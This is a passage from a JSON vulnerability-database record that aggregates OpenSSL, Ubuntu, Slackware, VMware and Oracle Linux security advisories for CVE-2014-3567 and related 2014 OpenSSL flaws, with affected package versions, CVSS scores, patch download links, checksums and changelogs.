{"name": "openssl", "version": "0.9.8s", "operator": "eq"}, {"name": "openssl", "version": "0.9.8r", "operator": "eq"}, {"name": "openssl", "version": "1.0.0c", "operator": "eq"}, {"name": "openssl", "version": "0.9.8zb", "operator": "eq"}, {"name": "openssl", "version": "0.9.8h", "operator": "eq"}, {"name": "openssl", "version": "1.0.0i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8k", "operator": "eq"}, {"name": "openssl", "version": "1.0.1g", "operator": "eq"}, {"name": "openssl", "version": "1.0.0g", "operator": "eq"}, {"name": "openssl", "version": "1.0.1e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8za", "operator": "eq"}, {"name": "openssl", "version": "1.0.1h", "operator": "eq"}, {"name": "openssl", "version": "0.9.8y", "operator": "eq"}, {"name": "openssl", "version": "1.0.0f", "operator": "eq"}], "cvelist": ["CVE-2014-3567"], "modified": "2014-10-15T00:00:00", "id": "OPENSSL:CVE-2014-3567", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-03-29T18:20:44", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3513", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3567"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "0.9.8k-7ubuntu8.22", "arch": "noarch", "packageName": "libssl0.9.8", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "1.0.1-4ubuntu5.20", "arch": "noarch", "packageName": "libssl1.0.0", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1.0.1f-1ubuntu2.7", "arch": "noarch", "packageName": "libssl1.0.0", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "It was discovered that OpenSSL incorrectly handled memory when parsing DTLS SRTP extension data. A remote attacker could possibly use this issue to cause OpenSSL to consume resources, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3513)\n\nIt was discovered that OpenSSL incorrectly handled memory when verifying the integrity of a session ticket. A remote attacker could possibly use this issue to cause OpenSSL to consume resources, resulting in a denial of service. (CVE-2014-3567)\n\nIn addition, this update introduces support for the TLS Fallback Signaling Cipher Suite Value (TLS_FALLBACK_SCSV). This new feature prevents protocol downgrade attacks when certain applications such as web browsers attempt to reconnect using a lower protocol version for interoperability reasons.", "edition": 1, "reporter": "Ubuntu", "published": "2014-10-16T00:00:00", "title": "OpenSSL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3513", "CVE-2014-3567"], "modified": "2014-10-16T00:00:00", "href": "https://usn.ubuntu.com/2385-1/", "id": "USN-2385-1", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-02-02T18:11:37", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-0.9.8zc-i486-1_slack13.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-0.9.8zc-x86_64-1_slack13.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-1.0.1j-i486-1_slack14.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-1.0.1j-x86_64-1_slack14.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-0.9.8zc-x86_64-1_slack13.37.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-solibs-1.0.1j-i486-1_slack14.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-0.9.8zc-x86_64-1_slack13.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-solibs-0.9.8zc-i486-1_slack13.0.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-1.0.1j-x86_64-1_slack14.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-0.9.8zc-i486-1_slack13.0.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-solibs-0.9.8zc-i486-1_slack13.37.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-1.0.1j-i486-1_slack14.1.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "i486", "packageFilename": "openssl-solibs-1.0.1j-i486-1_slack14.1.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.0.1j", "arch": "x86_64", "packageFilename": "openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-0.9.8zc-i486-1_slack13.37.txz", "packageName": "openssl", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "0.9.8zc", "arch": "x86_64", "packageFilename": "openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz", "packageName": "openssl-solibs", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "0.9.8zc", "arch": "i486", "packageFilename": "openssl-solibs-0.9.8zc-i486-1_slack13.1.txz", "packageName": "openssl-solibs", "operator": "lt"}], "description": "New openssl packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/openssl-solibs-1.0.1j-i486-1_slack14.1.txz: Upgraded.\n (* Security fix *)\npatches/packages/openssl-1.0.1j-i486-1_slack14.1.txz: Upgraded.\n This update fixes several security issues:\n SRTP Memory Leak (CVE-2014-3513):\n A flaw in the DTLS SRTP extension parsing code allows an attacker, who\n sends a carefully crafted handshake message, to cause OpenSSL to fail\n to free up to 64k of memory causing a memory leak. This could be\n exploited in a Denial Of Service attack.\n Session Ticket Memory Leak (CVE-2014-3567):\n When an OpenSSL SSL/TLS/DTLS server receives a session ticket the\n integrity of that ticket is first verified. In the event of a session\n ticket integrity check failing, OpenSSL will fail to free memory\n causing a memory leak. By sending a large number of invalid session\n tickets an attacker could exploit this issue in a Denial Of Service\n attack.\n SSL 3.0 Fallback protection:\n OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\n to block the ability for a MITM attacker to force a protocol\n downgrade.\n Some client applications (such as browsers) will reconnect using a\n downgraded protocol to work around interoperability bugs in older\n servers. This could be exploited by an active man-in-the-middle to\n downgrade connections to SSL 3.0 even if both sides of the connection\n support higher protocols. SSL 3.0 contains a number of weaknesses\n including POODLE (CVE-2014-3566).\n Build option no-ssl3 is incomplete (CVE-2014-3568):\n When OpenSSL is configured with "no-ssl3" as a build option, servers\n could accept and complete a SSL 3.0 handshake, and clients could be\n configured to send them.\n For more information, see:\n https://www.openssl.org/news/secadv_20141015.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zc-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zc-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zc-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zc-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zc-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1j-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1j-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1j-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1j-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1j-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1j-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1j-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1j-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1j-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1j-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 packages:\n44d336a121b39296f0e6bbeeb283dd2b openssl-0.9.8zc-i486-1_slack13.0.txz\n8342cfb351e59ecf5ea6d8cba66f0040 openssl-solibs-0.9.8zc-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n671f12535bdc10ab24388b713351aca2 openssl-0.9.8zc-x86_64-1_slack13.0.txz\n21e380284cdfab2fd15fffe2e0aed526 openssl-solibs-0.9.8zc-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n64cb819f1e07522bd5d7ceedd0a9ab50 openssl-0.9.8zc-i486-1_slack13.1.txz\n5fe4e385b2251cfd7e8ae5963ec6cef1 openssl-solibs-0.9.8zc-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n94feb6699d6f2cc7750a6b2e17ccaaa2 openssl-0.9.8zc-x86_64-1_slack13.1.txz\n2c17e4286509c29074ab0168367b851e openssl-solibs-0.9.8zc-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n4483d91c776c7e23c59246c4e0aa24aa openssl-0.9.8zc-i486-1_slack13.37.txz\nfedd58eb19bc13c9dd88d947827a7370 openssl-solibs-0.9.8zc-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n5d48ac1e9339efc35e304c7d48b2e762 openssl-0.9.8zc-x86_64-1_slack13.37.txz\n6f5e2b576259477c13f12cbed9be8804 openssl-solibs-0.9.8zc-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\n2b678160283bc696565dc8bd8b28c0eb openssl-1.0.1j-i486-1_slack14.0.txz\nf7762615c990713e9e86d4da962f1022 openssl-solibs-1.0.1j-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n41010ca37d49b74e7d7dc3f1c6ddc57e openssl-1.0.1j-x86_64-1_slack14.0.txz\n40dc6f3de217279d6140c1efcc0d45c8 openssl-solibs-1.0.1j-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n024ecea55e22e47f9fbb4b81a7b72a51 openssl-1.0.1j-i486-1_slack14.1.txz\n0a575668bb41ec4c2160800611f7f627 openssl-solibs-1.0.1j-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nd07fe289f7998a584c2b0d9810a8b9aa openssl-1.0.1j-x86_64-1_slack14.1.txz\n1ffc5d0c02b0c60cefa5cf9189bfc71d openssl-solibs-1.0.1j-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n53c9f51a79460bbfc5dec5720317cd53 a/openssl-solibs-1.0.1j-i486-1.txz\ncc059aa63494f3b005a886c70bc3f5d6 n/openssl-1.0.1j-i486-1.txz\n\nSlackware x86_64 -current packages:\n500709555e652adcd84b4e02dfab4eeb a/openssl-solibs-1.0.1j-x86_64-1.txz\nc483ca9c450fa90a901ac013276ccc53 n/openssl-1.0.1j-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg openssl-1.0.1j-i486-1_slack14.1.txz openssl-solibs-1.0.1j-i486-1_slack14.1.txz", "edition": 1, "reporter": "Slackware Linux Project", "published": "2014-10-15T10:58:22", "type": "slackware", "title": "openssl", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-15T10:58:22", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.846452", "id": "SSA-2014-288-01", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2016-09-04T11:19:27", "references": [], "affectedPackage": [{"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi510-201503101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi550-201403102-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.1", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "eq"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi510-201410101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi550-201501101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi510-201404101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "Mac OS", "OSVersion": "any", "packageVersion": "6.0.5", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "Fusion", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi500-201405101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "Windows/Linux", "OSVersion": "any", "packageVersion": "10.0.5", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "Workstation", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "eq"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "5.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "eq"}, {"OS": "any", "OSVersion": "any", "packageVersion": "Update 2d", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "lt"}, {"OS": "Mac OS", "OSVersion": "any", "packageVersion": "7.0.1", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "Fusion", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi500-201502101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "Windows/Linux", "OSVersion": "any", "packageVersion": "6.0.5", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "Player", "operator": "lt"}], "description": "**a. VMware ESXi, Workstation, Player, and Fusion host privilege escalation vulnerability**\n\nVMware ESXi, Workstation, Player and Fusion contain an arbitrary file write issue. Exploitation this issue may allow for privilege escalation on the host. \n \nThe vulnerability does not allow for privilege escalation from the guest Operating System to the host or vice-versa. This means that host memory can not be manipulated from the Guest Operating \nSystem. \n \n**Mitigation** \n \nFor ESXi to be affected, permissions must have been added to ESXi (or a vCenter Server managing it) for a virtual machine administrator role or greater. \n \nVMware would like to thank Shanon Olsson for reporting this issue to us through JPCERT. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2014-8370 to this issue. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 1, "reporter": "VMware", "published": "2015-01-27T00:00:00", "title": "VMware vCenter Server, ESXi, Workstation, Player, and Fusion updates address security issues", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "vmware", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2015-1044", "CVE-2014-3513", "CVE-2014-8370", "CVE-2014-3660", "CVE-2014-3567", "CVE-2014-3568", "CVE-2015-1043"], "modified": "2015-03-26T00:00:00", "id": "VMSA-2015-0001", "href": "https://www.vmware.com/security/advisories/VMSA-2015-0001.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2017-02-06T15:01:03", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "src", "packageFilename": "openssl-1.0.1e-34.el7_0.6.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "i686", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageFilename": "openssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "src", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "src", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "i686", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "i686", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageFilename": "openssl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageFilename": "openssl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageFilename": "openssl-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-devel", "operator": "lt"}], "edition": 1, "description": "[1.0.1e-30.2]\n- fix CVE-2014-3567 - memory leak when handling session tickets\n- fix CVE-2014-3513 - memory leak in srtp support\n- add support for fallback SCSV to partially mitigate CVE-2014-3566\n (padding attack on SSL3)\n[1.0.1e-30]\n- add ECC TLS extensions to DTLS (#1119800)\n[1.0.1e-29]\n- fix CVE-2014-3505 - doublefree in DTLS packet processing\n- fix CVE-2014-3506 - avoid memory exhaustion in DTLS\n- fix CVE-2014-3507 - avoid memory leak in DTLS\n- fix CVE-2014-3508 - fix OID handling to avoid information leak\n- fix CVE-2014-3509 - fix race condition when parsing server hello\n- fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS\n- fix CVE-2014-3511 - disallow protocol downgrade via fragmentation\n[1.0.1e-28]\n- fix CVE-2014-0224 fix that broke EAP-FAST session resumption support\n[1.0.1e-26]\n- drop EXPORT, RC2, and DES from the default cipher list (#1057520)\n- print ephemeral key size negotiated in TLS handshake (#1057715)\n- do not include ECC ciphersuites in SSLv2 client hello (#1090952)\n- properly detect encryption failure in BIO (#1100819)\n- fail on hmac integrity check if the .hmac file is empty (#1105567)\n- FIPS mode: make the limitations on DSA, DH, and RSA keygen\n length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment\n variable is set\n[1.0.1e-25]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-24]\n- add back support for secp521r1 EC curve\n[1.0.1e-23]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-22]\n- use 2048 bit RSA key in FIPS selftests\n[1.0.1e-21]\n- add DH_compute_key_padded needed for FIPS CAVS testing\n- make 3des strength to be 128 bits instead of 168 (#1056616)\n- FIPS mode: do not generate DSA keys and DH parameters < 2048 bits\n- FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys)\n- FIPS mode: add DH selftest\n- FIPS mode: reseed DRBG properly on RAND_add()\n- FIPS mode: add RSA encrypt/decrypt selftest\n- FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key\n- use the key length from configuration file if req -newkey rsa is invoked\n[1.0.1e-20]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n[1.0.1e-19]\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1.0.1e-18]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n[1.0.1e-17]\n- add back some no-op symbols that were inadvertently dropped", "reporter": "Oracle", "published": "2014-10-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "oraclelinux", "title": "openssl security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3505", "CVE-2014-3508", "CVE-2014-3566", "CVE-2013-6449", "CVE-2014-3507", "CVE-2014-3513", "CVE-2014-0224", "CVE-2014-3511", "CVE-2014-3470", "CVE-2014-3506", "CVE-2013-6450", "CVE-2010-5298", "CVE-2014-0160", "CVE-2013-4353", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-3567", "CVE-2014-3510", "CVE-2014-3509", "CVE-2014-0221"], "modified": "2014-10-16T00:00:00", "id": "ELSA-2014-1652", "href": "http://linux.oracle.com/errata/ELSA-2014-1652.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-02-06T15:00:41", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-libs-1.0.1e-51.ksplice1.el7_2.7.x86_64.rpm", "arch": "x86_64", "packageName": "openssl-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-devel-1.0.1e-51.ksplice1.el7_2.7.i686.rpm", "arch": "i686", 